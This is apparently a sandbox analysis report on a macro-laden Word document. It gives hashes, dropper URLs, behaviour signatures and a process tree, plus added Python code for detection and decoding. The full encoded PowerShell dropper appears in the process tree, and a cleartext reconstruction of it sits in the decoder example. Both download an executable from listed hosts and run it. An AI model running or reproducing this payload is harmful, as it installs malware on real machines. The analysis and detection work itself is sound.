Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64 arch:x86 image:win7-20231129-en locale:en-us os:windows7-x64 system
  • submitted
    31-05-2024 01:48

General

  • Target

    85a474ddbd555c895f388a4bd6027497_JaffaCakes118.doc

  • Size

    237KB

  • MD5

    85a474ddbd555c895f388a4bd6027497

  • SHA1

    67f909b1d4b16f691a88dbfc65b8d72a05b441c6

  • SHA256

    fda68ab66880ec8154bdc1a9595ec1f34fbf612ed3e9c9d13c7424ca0df1a5f4

  • SHA512

    6465c515fc534f8a0a674a8e882faf2f65353798dbea182e8e09c4caf52837457763e39b405e351f9254247a8836ef11663c54c24482e52460dd809c389988c0

  • SSDEEP

    3072:Pj6yw1MgpQiBhGWb6esLbTh8YuyDRBFtdfGkPmF9wsuD:PHgtEWPsL/aTyT9GkPmF9wsg

Score
10/10

Malware Config

Extracted

Language
ps1 (deobfuscated)

URLs (exe.dropper)

  • http://defiteqturkiye.com/Uh/
  • http://www.electropixel.com/Te8qO04/
  • http://elevationadvertising.com/mobile/cb595319/
  • http://etawala.com/bae05905/
  • http://diamondbraintutor.com/wp-includes/2G33O54/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
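Two of the signatures above, "Process spawned unexpected child process" and a PowerShell launch with an encoded command line, are the ones an analyst would turn into a process-tree rule. The Python below is an added example, not part of this report or of the sandbox's own rule set: it runs those two checks over a constructed process-creation log. The PIDs, image paths and command lines of WINWORD, splwow64 and powershell are taken from the process tree below; the explorer.exe and WmiPrvSE.exe entries, and WmiPrvSE.exe as the parent of the powershell process, are assumptions, because the report does not show that parent.

```python
"""Flag what two of this report's signatures describe: a script host started by a
process that should not spawn one, and a PowerShell launch with an encoded
(-e) command line. Added example; these are not the sandbox's own rules.

EVENTS is a CONSTRUCTED process-creation log. The PIDs, images and command
lines of WINWORD, splwow64 and powershell follow the report; the explorer and
WmiPrvSE entries, and the choice of WmiPrvSE as powershell's parent, are
assumptions, because the report does not show that parent.
"""
import base64
import binascii
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str     # full image path, as in Sysmon event 1 or Windows 4688
    cmdline: str


OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Assumption: a macro can start a process through WMI, so the direct parent
# of the script host is then WmiPrvSE.exe rather than the Office binary.
BROKERS = {"wmiprvse.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}

# "-e", "-enc", "-EncodedCommand": PowerShell accepts any unambiguous prefix of
# a parameter name, case-insensitively, which is why "powersheLL -e" works.
_ENC_FLAG = re.compile(r"(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]{16,})", re.I)


def basename(image: str) -> str:
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_encoded_command(flag: str, token: str) -> bool:
    """True when FLAG is a prefix of 'encodedcommand' and TOKEN is well-formed
    base64, so '-ep bypass' or '-ExecutionPolicy Unrestricted' do not match."""
    if not "encodedcommand".startswith(flag.lower()) or len(token) % 4:
        return False
    try:
        base64.b64decode(token, validate=True)
    except binascii.Error:
        return False
    return True


def detect(events: list[ProcEvent]) -> list[tuple[int, str]]:
    """Return (pid, reason) findings, in event order."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        name = basename(e.image)
        parent = by_pid.get(e.ppid)
        pname = basename(parent.image) if parent else "?"
        if name in SCRIPT_HOSTS and pname in OFFICE | BROKERS:
            findings.append((e.pid, f"unexpected child: {pname} -> {name}"))
        if name in {"powershell.exe", "pwsh.exe"}:
            m = _ENC_FLAG.search(e.cmdline)
            if m and is_encoded_command(m.group(1), m.group(2)):
                findings.append((e.pid, "powershell encoded command"))
    return findings


# Constructed sample log; see the module docstring for what is and is not from the report.
DOC = r"C:\Users\Admin\AppData\Local\Temp\85a474ddbd555c895f388a4bd6027497_JaffaCakes118.doc"
WINWORD = r"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"
EVENTS = [
    ProcEvent(1234, 1000, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(2996, 1234, WINWORD, f'"{WINWORD}" /n "{DOC}"'),
    ProcEvent(1956, 2996, r"C:\Windows\splwow64.exe", r"C:\Windows\splwow64.exe 12288"),
    ProcEvent(1200, 800, r"C:\Windows\System32\wbem\WmiPrvSE.exe", "WmiPrvSE.exe -secured -Embedding"),
    # Only the first 64 characters of the report's -e blob are carried here.
    ProcEvent(2780, 1200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe",
              "powersheLL -e JABZAHoAbAB4AGoAcABqAD0AKAAnAE8AZgBsACcAKwAnADEAeAA2ADcAJwApADsA"),
]

if __name__ == "__main__":
    for pid, reason in detect(EVENTS):
        print(pid, reason)
```

The splwow64.exe child is deliberately left unflagged: Word legitimately spawns the print spooler helper, so a rule that alerts on every Office child would drown the real signal. Both findings here land on the same PID, which is the usual shape of this chain.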

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\85a474ddbd555c895f388a4bd6027497_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2996
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1956
    • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
      powersheLL -e JABZAHoAbAB4AGoAcABqAD0AKAAnAE8AZgBsACcAKwAnADEAeAA2ADcAJwApADsAJgAoACcAbgBlAHcALQBpACcAKwAnAHQAJwArACcAZQBtACcAKQAgACQARQBuAFYAOgBUAGUAbQBQAFwAbwBmAGYAaQBDAEUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AHkAcABlACAARABJAHIARQBjAFQATwByAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMARQBgAGMAYABVAFIASQB0AGAAWQBQAHIAYABPAFQATwBDAGAAbwBMACIAIAA9ACAAKAAnAHQAbAAnACsAJwBzADEAMgAsACcAKwAnACAAdABsAHMAMQAxACwAIAB0AGwAJwArACcAcwAnACkAOwAkAFAAeQB6AG4ANABuAHcAIAA9ACAAKAAnAFUAbgByAG0AMgB3ACcAKwAnADYAJwArACcAZABkACcAKQA7ACQAUwAwAG8AYQBkAHAAMQA9ACgAJwBJADAAJwArACcAagBqACcAKwAnAHYAOQB1ACcAKQA7ACQASgA1AGcAawBkAHAAdAA9ACQAZQBuAHYAOgB0AGUAbQBwACsAKAAoACcAewAnACsAJwAwAH0AJwArACcATwAnACsAJwBmAGYAaQBjAGUAMgAwACcAKwAnADEAOQB7ADAAfQAnACkAIAAgAC0AZgBbAEMAaABhAHIAXQA5ADIAKQArACQAUAB5AHoAbgA0AG4AdwArACgAJwAuAGUAeAAnACsAJwBlACcAKQA7ACQAVAA5AGUANQBnADIANAA9ACgAJwBPACcAKwAnAHAAOABrADYAbAAnACsAJwA1ACcAKQA7ACQATgB6AGcANQBmADgANwA9AC4AKAAnAG4AJwArACcAZQB3AC0AbwBiAGoAZQBjACcAKwAnAHQAJwApACAAbgBlAHQALgB3AGUAQgBDAEwASQBlAE4AdAA7ACQATgB3ADEAbAB3AGQAbgA9ACgAJwBoAHQAJwArACcAdAAnACsAJwBwACcAKwAnADoAJwArACcALwAvACcAKwAnAGQAZQBmAGkAdABlACcAKwAnAHEAdAAnACsAJwB1AHIAawBpAHkAZQAnACsAJwAuAGMAbwAnACsAJwBtACcAKwAnAC8AJwArACcAVQBoACcAKwAnAC8AKgAnACsAJwBoAHQAdABwACcAKwAnADoALwAvAHcAJwArACcAdwB3AC4AJwArACcAZQAnACsAJwBsACcAKwAnAGUAYwB0ACcAKwAnAHIAbwAnACsAJwBwAGkAJwArACcAeABlACcAKwAnAGwALgBjAG8AbQAvAFQAJwArACcAZQA4AHEATwAwADQALwAqAGgAdAB0AHAAOgAvACcAKwAnAC8AZQBsAGUAdgBhAHQAaQAnACsAJwBvAG4AJwArACcAYQBkAHYAZQByAHQAaQBzACcAKwAnAGkAJwArACcAbgBnAC4AYwBvAG0ALwBtACcAKwAnAG8AYgBpAGwAZQAvAGMAYgA1ADkAJwArACcANQAzACcAKwAnADEAOQAvACoAJwArACcAaAB0AHQAJwArACcAcAA6ACcAKwAnAC8ALwAnACsAJwBlACcAKwAnAHQAYQB3ACcAKwAnAGEAbABhACcAKwAnAC4AYwBvAG0ALwBiAGEAJwArACcAZQAwADUAJwArACcAOQAwADUAJwArACcALwAqACcAKwAnAGgAdAB0AHAAOgAvAC8AZABpAGEAJwArACcAbQBvAG4AJwArACcAZAAnACsAJwBiAHIAYQBpACcAKwAnAG4AdAB1AHQAbwByAC4AYwBvACcAKwAnAG0ALwB3ACcAKwAnAHAALQBpACcAKwAnAG4AYwBsACcAKwAnAHUAZABlAHMALwAnACsAJwAyAEcAMwAzAE8ANQAnACsAJwA0AC8AJwApAC4AIgBTAFAATABgAGkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAE8AbgB6AGwAbwB0AGMAPQAoACcAQQByAHQAJwArACcAOAB6ACcAKwAnAHQAMwAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABVAGwAMwBqAHkAdgA3ACAAaQBuACAAJABOAHcAMQBsAHcAZABuACkAewB0AHIAeQB7ACQATgB6AGcANQBmADgANwAuACIAZABgAG8AdwBgAE4ATABvAGEARABgAEYAaQBsAEUAIgAoACQAVQBsADMAagB5AHYANwAsACAAJABKADUAZwBrAGQAcAB0ACkAOwAkAFQAbgA3ADgAXwBqADEAPQAoACcARAB5AHEAJwArACcAeQAnACsAJwB0AHAAbAAnACkAOwBJAGYAIAAoACgALgAoACcARwBlACcAKwAnAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQASgA1AGcAawBkAHAAdAApAC4AIgBsAGAARQBuAGAARwBUAGgAIgAgAC0AZwBlACAAMgAwADQAMwA5ACkAIAB7ACYAKAAnAEkAbgB2AG8AJwArACcAawBlAC0ASQB0AGUAJwArACcAbQAnACkAKAAkAEoANQBnAGsAZABwAHQAKQA7ACQAQgAxAGkAaQBqAF8AaAA9ACgAJwBGADUAJwArACcAMQBpADcAYwBhACcAKQA7AGIAcgBlAGEAawA7ACQASgBzAHMAcQA4AGkAawA9ACgAJwBUAGYAMgAnACsAJwBjACcAKwAnAHAAbgB2ACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQATQAzAHgANQB1AGwAcwA9ACgAJwBSAGIAJwArACcAMwAnACsAJwBxAF8AMgBqACcAKQA=
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2780
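Decoding the `-e` argument above by hand (it is base64 over UTF-16LE text) gives a script that creates %TEMP%\Office2019, sets ServicePointManager's SecurityProtocol to "tls12, tls11, tls", splits a '*'-joined string into the five URLs listed under Malware Config, tries each with WebClient.DownloadFile into %TEMP%\Office2019\Unrm2w6dd.exe, and runs that file with Invoke-Item as soon as one download is at least 20439 bytes. The Python below is an added analyst example, not code from the report or from the sandbox: it decodes such a blob and folds the obfuscation (('a'+'b') concatenations, backtick-split method names, the -f [Char]92 path template) to recover the URLs, the drop path and the size threshold. SAMPLE_PS is a constructed command written in the same style; the report's verbatim command is the base64 in the process tree, which decode_powershell accepts even when a viewer has wrapped it across lines.

```python
"""Decode and de-obfuscate a `powershell -e` dropper command of the kind shown
in this report's process tree.

Added analyst example; it is not the sandbox's code. SAMPLE_PS is a CONSTRUCTED
command written in the same style as the report's -e blob (string-concatenation
obfuscation, backtick-split method names, a '*'-joined URL list and a
-f [Char]92 path template); the real command is the base64 in the process tree.
"""
import base64
import re

# Constructed sample in the style of the report's payload (not a verbatim copy).
SAMPLE_PS = r"""$Yzlxjpj=('Ofl'+'1x67');&('new-i'+'t'+'em') $EnV:TemP\offiCE2019 -itemtype DIrEcTOry;
[Net.ServicePointManager]::"sE`c`URIt`YPr`OTOC`oL" = ('tl'+'s12,'+' tls11, tl'+'s');
$Pyzn4nw = ('Unrm2w'+'6'+'dd');
$J5gkdpt=$env:temp+(('{'+'0}'+'O'+'ffice20'+'19{0}')  -f[Char]92)+$Pyzn4nw+('.ex'+'e');
$Nzg5f87=.('n'+'ew-objec'+'t') net.weBCLIeNt;
$Nw1lwdn=('ht'+'t'+'p'+':'+'//'+'defite'+'qt'+'urkiye'+'.co'+'m'+'/'+'Uh'+'/*'+'http'+'://w'+'ww.'+'e'+'l'+'ect'+'ro'+'pi'+'xe'+'l.com/T'+'e8qO04/*http:/'+'/elevati'+'on'+'advertis'+'i'+'ng.com/m'+'obile/cb59'+'53'+'19/*'+'htt'+'p:'+'//'+'e'+'taw'+'ala'+'.com/ba'+'e05'+'905'+'/*'+'http://dia'+'mon'+'d'+'brai'+'ntutor.co'+'m/w'+'p-i'+'ncl'+'udes/'+'2G33O5'+'4/')."SPL`iT"([char]42);
foreach($Ul3jyv7 in $Nw1lwdn){try{$Nzg5f87."d`ow`NLoaD`FilE"($Ul3jyv7, $J5gkdpt);
If ((.('Ge'+'t'+'-Item') $J5gkdpt)."l`En`GTh" -ge 20439) {&('Invo'+'ke-Ite'+'m')($J5gkdpt);break}}catch{}}"""


def encode_powershell(command: str) -> str:
    """Produce what `powershell -e` expects: base64 over UTF-16LE text."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_powershell(blob: str) -> str:
    """Inverse of encode_powershell. Whitespace is dropped first, so a blob that
    a report viewer wrapped across lines still decodes."""
    return base64.b64decode("".join(blob.split())).decode("utf-16-le")


_DQ_STRING = re.compile(r'"[^"]*"')
_CONCAT = re.compile(r"\(\s*'[^']*'(?:\s*\+\s*'[^']*')*\s*\)")
_VAR_ASSIGN = re.compile(r"\$(\w+)\s*=\s*'([^']*)'\s*;")
_URL = re.compile(r'''https?://[^'"*\s]+''')
_DROP_PATH = re.compile(
    r"\$env:temp\s*\+\s*\(\s*'([^']*)'\s*-f\s*\[Char\]\s*(\d+)\s*\)\s*\+\s*\$(\w+)\s*\+\s*'([^']*)'",
    re.I,
)
_MIN_SIZE = re.compile(r"-ge\s+(\d+)")


def strip_backticks(ps: str) -> str:
    """"d`ow`NLoaD`FilE" is DownloadFile: inside a double-quoted string a backtick
    before an ordinary letter escapes nothing and exists only to defeat substring
    matching, so dropping backticks within double quotes restores the name."""
    return _DQ_STRING.sub(lambda m: m.group(0).replace("`", ""), ps)


def fold_concats(ps: str) -> str:
    """Collapse ('a'+'b'+'c') into 'abc', repeating until nothing changes so that
    nested chains such as (('{'+'0}'+...) -f[Char]92) fold from the inside out."""
    def join(m: re.Match) -> str:
        return "'" + "".join(re.findall(r"'([^']*)'", m.group(0))) + "'"
    while True:
        folded = _CONCAT.sub(join, ps)
        if folded == ps:
            return folded
        ps = folded


def analyze(command: str) -> dict:
    """Return the IOCs an analyst wants from the decoded command."""
    folded = fold_concats(strip_backticks(command))
    variables = dict(_VAR_ASSIGN.findall(folded))
    drop_path = None
    m = _DROP_PATH.search(folded)
    if m:
        template, char_code, var, ext = m.groups()
        # '{0}Office2019{0}' -f [Char]92 formats a backslash into each {0}
        drop_path = "%TEMP%" + template.replace("{0}", chr(int(char_code))) \
            + variables.get(var, "$" + var) + ext
    size = _MIN_SIZE.search(folded)
    return {
        "deobfuscated": folded,
        "urls": _URL.findall(folded),
        "drop_path": drop_path,
        "min_size": int(size.group(1)) if size else None,
    }


if __name__ == "__main__":
    result = analyze(decode_powershell(encode_powershell(SAMPLE_PS)))
    for url in result["urls"]:
        print("url:", url)
    print("drop path:", result["drop_path"], "min size:", result["min_size"])
```

Pasting the report's blob into decode_powershell gives the real script; the same decoding in PowerShell itself is `[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($blob))`. The folding is deliberately regex-based rather than an evaluator: the sample is never executed, and a command that uses a trick these patterns miss simply leaves that part unfolded in "deobfuscated" for manual reading.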

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      c9d2d3df8d7b4c3df04dd9431b8bf9ab

      SHA1

      09bbe6f1032836a9c7ede32582679524e5d3add9

      SHA256

      7c0983e1d962358c910381a13586092de991d37f279e939a2fc7e31ae4054df6

      SHA512

      ea41d6ed67c15a2045b19688206bf80ac98c2f5f3ab592a15cd5c60adbce3c79fbb04c65b0438ea251561ef4486e8f4afd52bd7ccbe4c86e1bf5d02457e62fa5

    • memory/2780-40-0x0000000001F40000-0x0000000001F48000-memory.dmp

      Filesize

      32KB

    • memory/2780-39-0x000000001B710000-0x000000001B9F2000-memory.dmp

      Filesize

      2.9MB

    • memory/2996-33-0x0000000005810000-0x0000000005910000-memory.dmp

      Filesize

      1024KB

    • memory/2996-8-0x0000000005BD0000-0x0000000005CD0000-memory.dmp

      Filesize

      1024KB

    • memory/2996-22-0x0000000005810000-0x0000000005910000-memory.dmp

      Filesize

      1024KB

    • memory/2996-23-0x0000000005810000-0x0000000005910000-memory.dmp

      Filesize

      1024KB

    • memory/2996-32-0x0000000005810000-0x0000000005910000-memory.dmp

      Filesize

      1024KB

    • memory/2996-0-0x000000002F611000-0x000000002F612000-memory.dmp

      Filesize

      4KB

    • memory/2996-7-0x0000000005810000-0x0000000005910000-memory.dmp

      Filesize

      1024KB

    • memory/2996-2-0x000000007096D000-0x0000000070978000-memory.dmp

      Filesize

      44KB

    • memory/2996-47-0x000000007096D000-0x0000000070978000-memory.dmp

      Filesize

      44KB

    • memory/2996-48-0x0000000005810000-0x0000000005910000-memory.dmp

      Filesize

      1024KB

    • memory/2996-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2996-66-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2996-67-0x000000007096D000-0x0000000070978000-memory.dmp

      Filesize

      44KB